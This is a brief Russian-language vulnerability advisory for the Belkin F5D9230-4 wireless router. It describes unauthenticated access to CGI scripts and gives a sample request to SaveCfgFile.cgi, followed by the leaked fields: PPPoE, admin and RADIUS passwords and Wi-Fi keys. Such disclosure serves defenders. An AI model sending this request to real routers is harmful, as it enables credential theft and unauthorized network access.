Программа: Belkin Wireless G Plus MIMO Router F5D9230-4
Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки, позволяющей
получить доступ к некоторым cgi скриптам без аутентификации в системе.
Эксплуатирование уязвимости позволит получить такие данные как имя и пароль
пользователя PPP, имя и пароль пользователя администратора, WAP ключи и другие.
Пример:
Получение конфигурационного файла:
http://<ROUTER_IP>/SaveCfgFile.cgi
pppoe_username=...
pppoe_password=...
wl0_pskkey=...
wl0_key1=...
mradius_password=...
mradius_secret=...
httpd_password=...
http_passwd=...
pppoe_passwd=...